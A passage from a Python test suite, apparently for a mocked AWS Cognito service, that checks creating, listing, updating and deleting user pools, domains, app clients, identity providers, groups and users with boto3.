result["UserPool"]["EstimatedNumberOfUsers"].should.equal(users_count) @mock_cognitoidp def test_describe_user_pool_resource_not_found(): conn = boto3.client("cognito-idp", "us-east-1") user_pool_id = "us-east-1_FooBar123" with pytest.raises(ClientError) as exc: conn.describe_user_pool(UserPoolId=user_pool_id) err = exc.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") err["Message"].should.equal(f"User pool {user_pool_id} does not exist.") @mock_cognitoidp def test_update_user_pool(): conn = boto3.client("cognito-idp", "us-east-1") name = str(uuid.uuid4()) user_pool_details = conn.create_user_pool( PoolName=name, Policies={ "PasswordPolicy": { "MinimumLength": 12, "RequireUppercase": False, "RequireLowercase": False, "RequireNumbers": False, "RequireSymbols": False, } }, ) new_policies = { "PasswordPolicy": { "MinimumLength": 16, "RequireUppercase": True, "RequireLowercase": True, "RequireNumbers": True, "RequireSymbols": True, } } conn.update_user_pool( UserPoolId=user_pool_details["UserPool"]["Id"], Policies=new_policies ) updated_user_pool_details = conn.describe_user_pool( UserPoolId=user_pool_details["UserPool"]["Id"] ) updated_user_pool_details["UserPool"]["Policies"].should.equal(new_policies) @mock_cognitoidp def test_delete_user_pool(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.list_user_pools(MaxResults=10)["UserPools"].should.have.length_of(1) conn.delete_user_pool(UserPoolId=user_pool_id) conn.list_user_pools(MaxResults=10)["UserPools"].should.have.length_of(0) @mock_cognitoidp def test_create_user_pool_domain(): conn = 
boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result["CloudFrontDomain"].should_not.be.none @mock_cognitoidp def test_create_user_pool_domain_custom_domain_config(): conn = boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) custom_domain_config = { "CertificateArn": "arn:aws:acm:us-east-1:{}:certificate/123456789012".format( ACCOUNT_ID ) } user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_user_pool_domain( UserPoolId=user_pool_id, Domain=domain, CustomDomainConfig=custom_domain_config ) result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result["CloudFrontDomain"].should.equal("e2c343b3293ee505.cloudfront.net") @mock_cognitoidp def test_describe_user_pool_domain(): conn = boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result = conn.describe_user_pool_domain(Domain=domain) result["DomainDescription"]["Domain"].should.equal(domain) result["DomainDescription"]["UserPoolId"].should.equal(user_pool_id) result["DomainDescription"]["AWSAccountId"].should_not.be.none @mock_cognitoidp def test_delete_user_pool_domain(): conn = boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result = conn.delete_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result = conn.describe_user_pool_domain(Domain=domain) # This is a surprising behavior of the real service: describing a missing domain comes # back with status 200 and a DomainDescription of {} result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result["DomainDescription"].keys().should.have.length_of(0) @mock_cognitoidp def test_update_user_pool_domain(): conn = boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) custom_domain_config = { "CertificateArn": "arn:aws:acm:us-east-1:{}:certificate/123456789012".format( ACCOUNT_ID ) } user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result = conn.update_user_pool_domain( UserPoolId=user_pool_id, Domain=domain, CustomDomainConfig=custom_domain_config ) result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result["CloudFrontDomain"].should.equal("e2c343b3293ee505.cloudfront.net") @mock_cognitoidp def test_create_user_pool_client(): conn = boto3.client("cognito-idp", "us-west-2") client_name = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=client_name, CallbackURLs=[value] ) result["UserPoolClient"]["UserPoolId"].should.equal(user_pool_id) bool(re.match(r"^[0-9a-z]{26}$", result["UserPoolClient"]["ClientId"])).should.be.ok result["UserPoolClient"]["ClientName"].should.equal(client_name) result["UserPoolClient"].should_not.have.key("ClientSecret") 
result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(value) @mock_cognitoidp def test_create_user_pool_client_returns_secret(): conn = boto3.client("cognito-idp", "us-west-2") client_name = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=client_name, GenerateSecret=True, CallbackURLs=[value], ) result["UserPoolClient"]["UserPoolId"].should.equal(user_pool_id) bool(re.match(r"^[0-9a-z]{26}$", result["UserPoolClient"]["ClientId"])).should.be.ok result["UserPoolClient"]["ClientName"].should.equal(client_name) result["UserPoolClient"]["ClientSecret"].should_not.be.none result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(value) @mock_cognitoidp def test_list_user_pool_clients(): conn = boto3.client("cognito-idp", "us-west-2") client_name = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_user_pool_client(UserPoolId=user_pool_id, ClientName=client_name) result = conn.list_user_pool_clients(UserPoolId=user_pool_id, MaxResults=10) result["UserPoolClients"].should.have.length_of(1) result["UserPoolClients"][0]["ClientName"].should.equal(client_name) @mock_cognitoidp def test_list_user_pool_clients_returns_max_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 user pool clients client_count = 10 for _ in range(client_count): client_name = str(uuid.uuid4()) conn.create_user_pool_client(UserPoolId=user_pool_id, ClientName=client_name) max_results = 5 result = conn.list_user_pool_clients( UserPoolId=user_pool_id, MaxResults=max_results ) result["UserPoolClients"].should.have.length_of(max_results) result.should.have.key("NextToken") @mock_cognitoidp def test_list_user_pool_clients_returns_next_tokens(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 user pool clients client_count = 10 for _ in range(client_count): client_name = str(uuid.uuid4()) conn.create_user_pool_client(UserPoolId=user_pool_id, ClientName=client_name) max_results = 5 result = conn.list_user_pool_clients( UserPoolId=user_pool_id, MaxResults=max_results ) result["UserPoolClients"].should.have.length_of(max_results) result.should.have.key("NextToken") next_token = result["NextToken"] result_2 = conn.list_user_pool_clients( UserPoolId=user_pool_id, MaxResults=max_results, NextToken=next_token ) result_2["UserPoolClients"].should.have.length_of(max_results) result_2.shouldnt.have.key("NextToken") @mock_cognitoidp def test_list_user_pool_clients_when_max_items_more_than_total_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 user pool clients client_count = 10 for _ in range(client_count): client_name = str(uuid.uuid4()) conn.create_user_pool_client(UserPoolId=user_pool_id, ClientName=client_name) max_results = client_count + 5 result = conn.list_user_pool_clients( UserPoolId=user_pool_id, MaxResults=max_results ) result["UserPoolClients"].should.have.length_of(client_count) result.shouldnt.have.key("NextToken") @mock_cognitoidp def test_describe_user_pool_client(): conn = 
boto3.client("cognito-idp", "us-west-2") client_name = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_details = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=client_name, CallbackURLs=[value] ) result = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"] ) result["UserPoolClient"]["ClientName"].should.equal(client_name) result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(value) @mock_cognitoidp def test_update_user_pool_client(): conn = boto3.client("cognito-idp", "us-west-2") old_client_name = str(uuid.uuid4()) new_client_name = str(uuid.uuid4()) old_value = str(uuid.uuid4()) new_value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_details = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=old_client_name, CallbackURLs=[old_value] ) result = conn.update_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"], ClientName=new_client_name, CallbackURLs=[new_value], ) result["UserPoolClient"]["ClientName"].should.equal(new_client_name) result["UserPoolClient"].should_not.have.key("ClientSecret") result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(new_value) @mock_cognitoidp def test_update_user_pool_client_returns_secret(): conn = boto3.client("cognito-idp", "us-west-2") old_client_name = str(uuid.uuid4()) new_client_name = str(uuid.uuid4()) old_value = str(uuid.uuid4()) new_value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_details = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=old_client_name, GenerateSecret=True, CallbackURLs=[old_value], ) client_secret = client_details["UserPoolClient"]["ClientSecret"] result = conn.update_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"], ClientName=new_client_name, CallbackURLs=[new_value], ) result["UserPoolClient"]["ClientName"].should.equal(new_client_name) result["UserPoolClient"]["ClientSecret"].should.equal(client_secret) result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(new_value) @mock_cognitoidp def test_delete_user_pool_client(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_details = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) ) conn.delete_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"] ) caught = False try: conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"], ) except conn.exceptions.ResourceNotFoundException: caught = True caught.should.be.true @mock_cognitoidp def test_create_identity_provider(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={"thing": value}, ) 
result["IdentityProvider"]["UserPoolId"].should.equal(user_pool_id) result["IdentityProvider"]["ProviderName"].should.equal(provider_name) result["IdentityProvider"]["ProviderType"].should.equal(provider_type) result["IdentityProvider"]["ProviderDetails"]["thing"].should.equal(value) @mock_cognitoidp def test_list_identity_providers(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={}, ) result = conn.list_identity_providers(UserPoolId=user_pool_id, MaxResults=10) result["Providers"].should.have.length_of(1) result["Providers"][0]["ProviderName"].should.equal(provider_name) result["Providers"][0]["ProviderType"].should.equal(provider_type) @mock_cognitoidp def test_list_identity_providers_returns_max_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 identity providers linked to a user pool identity_provider_count = 10 for _ in range(identity_provider_count): provider_name = str(uuid.uuid4()) provider_type = "Facebook" conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={}, ) max_results = 5 result = conn.list_identity_providers( UserPoolId=user_pool_id, MaxResults=max_results ) result["Providers"].should.have.length_of(max_results) result.should.have.key("NextToken") @mock_cognitoidp def test_list_identity_providers_returns_next_tokens(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 identity providers linked to a user pool identity_provider_count = 10 for _ in range(identity_provider_count): provider_name = str(uuid.uuid4()) provider_type = "Facebook" conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={}, ) max_results = 5 result = conn.list_identity_providers( UserPoolId=user_pool_id, MaxResults=max_results ) result["Providers"].should.have.length_of(max_results) result.should.have.key("NextToken") next_token = result["NextToken"] result_2 = conn.list_identity_providers( UserPoolId=user_pool_id, MaxResults=max_results, NextToken=next_token ) result_2["Providers"].should.have.length_of(max_results) result_2.shouldnt.have.key("NextToken") @mock_cognitoidp def test_list_identity_providers_when_max_items_more_than_total_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 identity providers linked to a user pool identity_provider_count = 10 for _ in range(identity_provider_count): provider_name = str(uuid.uuid4()) provider_type = "Facebook" conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={}, ) max_results = identity_provider_count + 5 result = conn.list_identity_providers( UserPoolId=user_pool_id, MaxResults=max_results ) result["Providers"].should.have.length_of(identity_provider_count) result.shouldnt.have.key("NextToken") @mock_cognitoidp def test_describe_identity_providers(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" value = 
str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={"thing": value}, ) result = conn.describe_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name ) result["IdentityProvider"]["UserPoolId"].should.equal(user_pool_id) result["IdentityProvider"]["ProviderName"].should.equal(provider_name) result["IdentityProvider"]["ProviderType"].should.equal(provider_type) result["IdentityProvider"]["ProviderDetails"]["thing"].should.equal(value) @mock_cognitoidp def test_update_identity_provider(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" value = str(uuid.uuid4()) new_value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={"thing": value}, ) result = conn.update_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderDetails={"thing": new_value}, ) result["IdentityProvider"]["UserPoolId"].should.equal(user_pool_id) result["IdentityProvider"]["ProviderName"].should.equal(provider_name) result["IdentityProvider"]["ProviderType"].should.equal(provider_type) result["IdentityProvider"]["ProviderDetails"]["thing"].should.equal(new_value) @mock_cognitoidp def test_update_identity_provider_no_user_pool(): conn = boto3.client("cognito-idp", "us-west-2") new_value = str(uuid.uuid4()) with pytest.raises(conn.exceptions.ResourceNotFoundException) as cm: conn.update_identity_provider( UserPoolId="foo", ProviderName="bar", ProviderDetails={"thing": new_value} ) cm.value.operation_name.should.equal("UpdateIdentityProvider") cm.value.response["Error"]["Code"].should.equal("ResourceNotFoundException") cm.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_update_identity_provider_no_identity_provider(): conn = boto3.client("cognito-idp", "us-west-2") new_value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(conn.exceptions.ResourceNotFoundException) as cm: conn.update_identity_provider( UserPoolId=user_pool_id, ProviderName="foo", ProviderDetails={"thing": new_value}, ) cm.value.operation_name.should.equal("UpdateIdentityProvider") cm.value.response["Error"]["Code"].should.equal("ResourceNotFoundException") cm.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_delete_identity_providers(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={"thing": value}, ) conn.delete_identity_provider(UserPoolId=user_pool_id, ProviderName=provider_name) caught = False try: conn.describe_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name ) except conn.exceptions.ResourceNotFoundException: caught = True caught.should.be.true @mock_cognitoidp def test_create_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name 
= str(uuid.uuid4()) description = str(uuid.uuid4()) role_arn = "arn:aws:iam:::role/my-iam-role" precedence = random.randint(0, 100000) result = conn.create_group( GroupName=group_name, UserPoolId=user_pool_id, Description=description, RoleArn=role_arn, Precedence=precedence, ) result["Group"]["GroupName"].should.equal(group_name) result["Group"]["UserPoolId"].should.equal(user_pool_id) result["Group"]["Description"].should.equal(description) result["Group"]["RoleArn"].should.equal(role_arn) result["Group"]["Precedence"].should.equal(precedence) result["Group"]["LastModifiedDate"].should.be.a("datetime.datetime") result["Group"]["CreationDate"].should.be.a("datetime.datetime") @mock_cognitoidp def test_create_group_with_duplicate_name_raises_error(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) with pytest.raises(ClientError) as cm: conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) cm.value.operation_name.should.equal("CreateGroup") cm.value.response["Error"]["Code"].should.equal("GroupExistsException") cm.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_get_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) result = conn.get_group(GroupName=group_name, UserPoolId=user_pool_id) result["Group"]["GroupName"].should.equal(group_name) result["Group"]["UserPoolId"].should.equal(user_pool_id) result["Group"]["LastModifiedDate"].should.be.a("datetime.datetime") result["Group"]["CreationDate"].should.be.a("datetime.datetime") @mock_cognitoidp def test_list_groups(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) result = conn.list_groups(UserPoolId=user_pool_id) result["Groups"].should.have.length_of(1) result["Groups"][0]["GroupName"].should.equal(group_name) @mock_cognitoidp def test_delete_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) result = conn.delete_group(GroupName=group_name, UserPoolId=user_pool_id) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected with pytest.raises(ClientError) as cm: conn.get_group(GroupName=group_name, UserPoolId=user_pool_id) cm.value.response["Error"]["Code"].should.equal("ResourceNotFoundException") @mock_cognitoidp def test_admin_add_user_to_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected @mock_cognitoidp def test_admin_add_user_to_group_with_username_attributes(): conn = 
boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = "test@example.com" conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected @mock_cognitoidp def test_admin_add_user_to_group_again_is_noop(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) # should there be an assertion here? @mock_cognitoidp def test_list_users_in_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.list_users_in_group(UserPoolId=user_pool_id, GroupName=group_name) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username) @mock_cognitoidp def test_list_users_in_group_ignores_deleted_user(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) username2 = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username2) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username2, GroupName=group_name ) conn.admin_delete_user(UserPoolId=user_pool_id, Username=username) result = conn.list_users_in_group(UserPoolId=user_pool_id, GroupName=group_name) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username2) @mock_cognitoidp def test_admin_list_groups_for_user(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id) result["Groups"].should.have.length_of(1) result["Groups"][0]["GroupName"].should.equal(group_name) @mock_cognitoidp def test_admin_list_groups_for_user_with_username_attribute(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = 
conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = "test@example.com" conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id) result["Groups"].should.have.length_of(1) result["Groups"][0]["GroupName"].should.equal(group_name) @mock_cognitoidp def test_admin_list_groups_for_user_ignores_deleted_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) group_name2 = str(uuid.uuid4()) conn.create_group(GroupName=group_name2, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name2 ) conn.delete_group(GroupName=group_name, UserPoolId=user_pool_id) result = conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id) result["Groups"].should.have.length_of(1) result["Groups"][0]["GroupName"].should.equal(group_name2) @mock_cognitoidp def test_admin_remove_user_from_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.admin_remove_user_from_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.list_users_in_group(UserPoolId=user_pool_id, GroupName=group_name)[ "Users" ].should.have.length_of(0) conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id)[ "Groups" ].should.have.length_of(0) @mock_cognitoidp def test_admin_remove_user_from_group_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = "test@example.com" conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.admin_remove_user_from_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.list_users_in_group(UserPoolId=user_pool_id, GroupName=group_name)[ "Users" ].should.have.length_of(0) conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id)[ "Groups" ].should.have.length_of(0) @mock_cognitoidp def test_admin_remove_user_from_group_again_is_noop(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = 
conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) @mock_cognitoidp def test_admin_create_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) result["User"]["Username"].should.equal(username) result["User"]["UserStatus"].should.equal("FORCE_CHANGE_PASSWORD") result["User"]["Attributes"].should.have.length_of(2) def _verify_attribute(name, v): attr = [a for a in result["User"]["Attributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("thing", value) result["User"]["Enabled"].should.equal(True) @mock_cognitoidp def test_admin_create_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] result = conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) result["User"]["Username"].should_not.equal(username) result["User"]["UserStatus"].should.equal("FORCE_CHANGE_PASSWORD") result["User"]["Attributes"].should.have.length_of(3) def _verify_attribute(name, v): attr = [a for a in result["User"]["Attributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("thing", value) _verify_attribute("email", username) result["User"]["Enabled"].should.equal(True) @mock_cognitoidp def test_admin_create_user_with_incorrect_username_attribute_type_fails(): conn = boto3.client("cognito-idp", "us-west-2") value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] with pytest.raises(ClientError) as ex: username = str(uuid.uuid4()) conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) err = ex.value.response["Error"] err["Code"].should.equal("InvalidParameterException") err["Message"].should.equal("Username should be either an email or a phone number.") @mock_cognitoidp def test_admin_create_user_with_existing_username_attribute_fails(): conn = boto3.client("cognito-idp", 